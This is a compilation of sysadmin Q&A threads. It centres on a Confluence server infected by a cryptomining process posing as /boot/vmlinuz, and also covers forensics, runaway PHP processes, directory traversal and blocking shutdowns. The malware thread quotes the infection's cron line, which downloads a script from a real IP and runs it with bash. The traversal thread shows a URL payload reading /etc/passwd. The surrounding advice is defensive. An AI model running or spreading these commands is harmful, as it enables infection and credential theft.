vmlinuz process runs on 100% CPU - linux

I'm running a Jira and a Confluence instance (and nginx reverse proxy) on a VPS. Currently, I can't start the confluence for some reason and I think this is a consequence of something else.
I've checked the process list:
The confluence user running the /boot/vmlinuz process and it eats the CPU. If I kill -9 this process it starts again a few seconds later.
After reboot the VPS:
Confluence and Jira started automatically.
Confluence is running a few seconds correctly then something kills the process. The Jira process is still running.
The /boot/vmlinuz process starts.
I've removed the Confluence from the automatic start, but it doesn't matter.
So my questions:
What is this /boot/vmlinuz process? I never saw this. (Yes I know, the vmlinuz is the kernel)
Why is starting over and over again and runs on 100% CPU?
What should I do to get back the normal behavior and may I start the Confluence?
Thanks any for answer
UPDATE
It caused by a hack. If you find a /tmp/seasame file, your server is infected. It uses the cron to download this file. I've removed the files in the /tmp folder, killed all the processes, disabled the cron for the confluence user, and updated the Confluence.

Your server looks like hacked.
Please take a look on process list closely.
e.g. run ps auxc and take a look on process binary sources.
You can use tools like rkhunter to scan your server but in general you should at the beginning kill everything that has been lunched as confluence user, scan your server/account, upgrade your confluence (in most cases user determinate source of attack), and look in your confluence for additional accounts etc.
Is you would like to see what is in that process, take a look on /proc e.g. in ls -la /proc/996. You will see source binary there too. You can also lunch strace -ff -p 996 to see what process is doing or cat /proc/996/exe | strings to see what strings that binary have. This is probably some kind of botnet part, miner etc.

I had same problem, it was hacked, the virus script was at /tmp, find the script name from command "top" (insignificance letters,name of "fcbk6hj" was mine. )and kill the processes(maybe 3 processes)
root 3158 1 0 15:18 ? 00:00:01 ./fcbk6hj ./jd8CKgl
root 3159 1 0 15:18 ? 00:00:01 ./fcbk6hj ./5CDocHl
root 3160 1 0 15:18 ? 00:00:11 ./fcbk6hj ./prot
kill all of them and delete /tmp/prot, and kill the process of /boot/vmlinuz, CPU's back.
I found that virus had dowloaded script to /tmp automatically, my method was mv wgetak to other name.
Virus behavious:
wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo
found following task was written in crontab, just delete it:
*/5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 && bash /tmp/seasame

After remove this from system and crontab, maybe is good idea (at least for now) to add confluence user to /etc/cron.deny.
And after:
$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information

I met same question too at the same time,maybe it is a confluence bug. I just kill confluence process,the it got alright.

As you found out, this is malware — actually cryptojacking malware, intended to use your CPU as a cryptocurrency miner.
Your server has very likely been compromised because of a Confluence vulnerability (see first answer of this reddit post), however one should know that this is NOT ITS ONLY WAY OF PROPAGATION — this can't be emphasize enough. As a matter of fact a server of mine has been compromised as well although it doesn't run Confluence (I don't even know this software…), and the so-called /boot/vmlinuz process was ran by root.
Also, beware that this malware tries to propagate through SSH using known_hosts and SSH keys, so you should check other computers you accessed from this server.
Finally, the reddit post links to this comprehensive description of this malware, which is worth a read.
NB : Don't forget to send a report to the IP's ISP abuse email address.

Related

I observed a Java process running at root level through top command on my application server, will it lead to performance problems?

We were running a load test and simultaneously executed top command and observed that Java process (running at root level) was consuming 204℅ cpu, even though we ran just 10℅ of expected load on server.
Also one of my colleagues said that a Java process should not be running at root level as this leads to performance issues.
I tried searching the internet but could not find anything which says that Java process should not run at root level.
Note for experts :- please excuse me for my lack of knowledge, please do not download or block the question.
Screen shot of top command:
That's incorrect -- running a process as root will not affect performance, but will likely affect security.
The reason why everyone says not to run your processes as root unless ABSOLUTELY NECESSARY is because the root user has privileges over the entire disk, and many other things: external devices, hardware, processes, etc.
Running code that interacts with the world as root means that if anyone can find a vulnerability in your code / project / process / whatever, the amount of damage / harm that can be done is likely WAY MORE than what could be possible by a non-root user.
Try running the below command to find all the processes in Tree Structure.
ps -e -o pid,args --forest
From the output, you will be able to figure out those java processes or other processes running at Root level are children of whom. For ex. sometimes while testing some scripts, we ourselves trigger those scripts with sudo which might in turn starts the java instance.

Forensic analysis - process log

I am performing Forensic analysis on Host based evidence - examining partitions of a hard drive of a server.
I am interested in finding the processes all the "users" ran before the system died/rebooted.
As this isn't live analysis I can't use ps or top to see the running processes.
So, I was wondering if there is a log like /var/log/messages that shows me what processes users ran.
I have gone through a lot of logs in /var/log/* - they give me information about logins, package updates, authorization - but nothing about the processes.
If there was no "command accounting" enabled, there is no.
Chances to find something are not too big, anyway a few things to consider:
depends how gracefull death/reboot was (if processes were killed gracefully, .bash_history and similar files may be updated with recent session info)
utmp and wtmp files may give the list of active users at the reboot.
OS may be saving crash dump (depends on linux distribution). If so - You may be able to examine OS state at the moment of crash. See RedHat's crash for details (http://people.redhat.com/anderson/crash_whitepaper/).
/tmp, /var/tmp may hold some clues, what was running
any files with mtime and ctime timestamps (maybe atime also) near the time of crash
maybe You can get something usefull from swap partition (especially if reboot was related to heavy RAM usage).
So, I was wondering if there is a log like /var/log/messages that
shows me what processes users ran
Given the OS specified by the file system path of /var/log, I am assuming you are using ubuntu or some linux based server and if you are not doing live forensics while the box was running or memory forensics (where a memory capture was grabbed), AND you rebooted the system, there is no file within /var/log that will attribute processes to users. However, if the user was using the bash shell, then you could check the .bash_history file that shows the commands that were run by that user which I think is 500 (by default for the bash shell).
Alternatively, if a memory dump was made (/dev/mem or /dev/kmem), then you could used volatility to pull out processes that were run on the box. But still, I do not think you could attribute the processes to the users that ran them. You would need additional output from volatility for that link to be made.

Script killing too long process

I'm a webhosting owner, I don't know why currently, but I have some php scripts that are launched for many hours (as personnaly known customers), so I think there is a bug somewhere.
These scripts are eating the RAM AND the swap... So I'm looking for a way to list processes, find the execution time, kill them 1 by 1 if the execution exceed 10 or 20 minutes.
I'm not a bash master, but I know bash and pipes. The only thing I don't know, is how to list the processes (with execution time AND complete command line with arguments). Actually, even in top (then c) there is no arguments in php :/
Thanks for your help.
If you are running Apache with mod_php, you will not see a separate PHP process since the script is actually running inside an Apache process. If you are running as FastCGI, you also might not see a distinguishable PHP process for the actual script execution, though I have no experience with PHP/FastCGI and might be wrong on this.
You can set the max_execution_time option, but it is overridable at run time by calling set_time_limit() unless you run in Safe Mode. Safe mode, however, has been deprecated in PHP 5.3 and removed in 5.4, so you cannot rely on it if you are on 5.4 or plan to upgrade.
If you can manage it with your existing customers (since in some cases it requires non-trivial changes to PHP code), running PHP as CGI should allow you to monitor the actual script execution, as each CGI request will spawn a separate PHP interpreter process and you should be able to distinguish between the scripts they are executing. Note, however, that CGI is the least effective setup (the others being mod_php and FastCGI).
You can use the ps -aux command to list the processes with some detailed information.
You can also check out the ps man page.
This might also be of some help.

Using directory traversal attack to execute commands

Is there a way to execute commands using directory traversal attacks?
For instance, I access a server's etc/passwd file like this
http://server.com/..%01/..%01/..%01//etc/passwd
Is there a way to run a command instead? Like...
http://server.com/..%01/..%01/..%01//ls
..... and get an output?
To be clear here, I've found the vuln in our company's server. I'm looking to raise the risk level (or bonus points for me) by proving that it may give an attacker complete access to the system
Chroot on Linux is easily breakable (unlike FreeBSD). Better solution is to switch on SELinux and run Apache in SELinux sandbox:
run_init /etc/init.d/httpd restart
Make sure you have mod_security installed and properly configured.
If you are able to view /etc/passwd as a result of the document root or access to Directory not correctly configured on the server, then the presence of this vulnerability does not automatically mean you can execute commands of your choice.
On the other hand if you are able view entries from /etc/passwd as a result of the web application using user input (filename) in calls such as popen, exec, system, shell_exec, or variants without adequate sanitization, then you may be able to execute arbitrary commands.
Unless the web server is utterly hideously programmed by someone with no idea what they're doing, trying to access ls using that (assuming it even works) would result in you seeing the contents of the ls binary, and nothing else.
Which is probably not very useful.
Yes it is possible (the first question) if the application is really really bad (in terms of security).
http://www.owasp.org/index.php/Top_10_2007-Malicious_File_Execution
Edit#2: I have edited out my comments as they were deemed sarcastic and blunt. Ok now as more information came from gAMBOOKa about this, Apache with Fedora - which you should have put into the question - I would suggest:
Post to Apache forum, highlighting you're running latest version of Apache and running on Fedora and submit the exploit to them.
Post to Fedora's forum, again, highlighting you're running the latest version of Apache and submit the exploit to them.
It should be noted, include the httpd.conf to both of the sites when posting to their forums.
To minimize access to passwd files, look into running Apache in a sandbox/chrooted environment where any other files such as passwd are not visible outside of the sandbox/chrooted environment...have you a spare box lying around to experiment with it or even better use VMWARE to simulate the identical environment you are using for the Apache/Fedora - try get it to be IDENTICAL environment, and make the httpd server run within VMWare, and remotely access the Virtual machine to check if the exploit is still visible. Then chroot/sandbox it and re-run the exploit again...
Document the step-by-step to reproduce it and include a recommendation until a fix is found, meanwhile if there is minimal impact to the webserver running in sandbox/chrooted environment - push them to do so...
Hope this helps,
Best regards,
Tom.
If you already can view etc/passwd then the server must be poorly configured...
if you really want to execute commands then you need to know the php script running in the server whether there is any system() command so that you can pass commands through the url..
eg: url?command=ls
try to view the .htaccess files....it may do the trick..

Temporarily prevent linux from shutting down

I have a backup script that runs in the background daily on my linux (Fedora 9) computer. If the computer is shut down while the backup is in progress the backup may be damaged so I would like to write a small script that temporarily disables the ability of the user to reboot or shut the computer down.
It is not necessary that the script is uncirumventable, it's just to let the users of the system know that the backup is in progress and they shouldn't shut down. I've seen the Inhibit method on the DBus Free desktop power management spec:
http://people.freedesktop.org/~hughsient/temp/power-management-spec-0.3.html
but that only prevents shutdowns if the system is idle not explicitly at the users request.
Is there an easy way to do this in C/Python/Perl or bash?
Update: To clarify the question above, it's a machine with multiple users, but who use it sequentially via the plugged in keyboard/mouse. I'm not looking for a system that would stop me "hacking" around it as root. But a script that would remind me (or another user) that the backup is still running when I choose shut down from the Gnome/GDM menus
Another get-you-started solution: During shutdown, the system runs the scripts in /etc/init.d/ (or really, a script in /etc/rc.*/, but you get the idea.) You could create a script in that directory that checks the status of your backup, and delays shuts down until the backup completes. Or better yet, it gracefully interrupts your backup.
The super-user could workaround this script (with /sbin/halt for example,) but you can not prevent the super-user for doing anything if their mind is really set into doing it.
There is molly-guard to prevent accidental shutdows, reboots etc. until all required conditions are met -- conditions can be self-defined.
As already suggested you can as well perform backup operations as part of the shutdown process. See for example this page.
If users are going to be shutting down via GNOME/KDE, just inhibit them from doing so.
http://live.gnome.org/GnomePowerManager/FAQ#head-1cf52551bcec3107d7bae8c332fd292ec2261760
I can't help but feel that you're not grokking the Unix metaphor, and what you're asking for is a kludge.
If a user running as root, there's nothing root can do to stop root from shutting down the system! You can do window dressing things like obscuring shutdown UI, but that's not really accomplishing anything.
I can't tell if you're talking about this in the context of a multi-user machine, or a machine being used as a "desktop PC" with a single user sitting at a console. If it's the former, your users really shouldn't be accessing the machine with credentials that can shutdown the system for day-to-day activities. If it's the latter, I'd recommend educating the users to either (a) check that the script is running, or (b) use a particular shutdown script that you designate that checks for the script's process and refuses to shutdown until it's gone.
More a get-you-started than a complete solution, you could alias the shutdown command away, and then use a script like
#!/bin/sh
ps -ef|grep backupprocess|grep -v grep > /dev/null
if [ "$?" -eq 0 ]; then
echo Backup in progress: aborted shutdown
exit 0
else
echo Backup not in progress: shutting down
shutdown-alias -h now
fi
saved in the user's path as shutdown. I expect there would be some variation dependant on how your users invoke shutdown (Window manager icons/command line) and perhaps for different distros too.
But a script that would remind me (or another user) that the backup is still running when I choose shut down from the Gnome/GDM menus
One may use polkit to completely block shutdown/restart - but I failed to find method that would provide a clear response why it is blocked.
Adding the following lines as /etc/polkit-1/localauthority/50-local.d/restrict-login-powermgmt.pkla works:
[Disable lightdm PowerMgmt]
Identity=unix-user:*
Action=org.freedesktop.login1.reboot;org.freedesktop.login1.reboot-multiple-sessions;org.freedesktop.login1.power-off;org.freedesktop.login1.power-off-multiple-sessions;org.freedesktop.login1.suspend;org.freedesktop.login1.suspend-multiple-sessions;org.freedesktop.login1.hibernate;org.freedesktop.login1.hibernate-multiple-sessions
ResultAny=no
ResultInactive=no
ResultActive=no
You still see a confirmation dialog but there are not buttons to confirm. Looks ugly, but works ;)
Unfortunately this applies to all users, not only the lightdm session, so you have to add a second rule to white-list them if desired.
Note that this method block solely reboot/etc commands issued from GUI. To block reboot/etc commands from command line one may use molly-guard - as explained in https://askubuntu.com/questions/17187/disabling-shutdown-command-for-all-users-even-root-consequences/17255#17255

Resources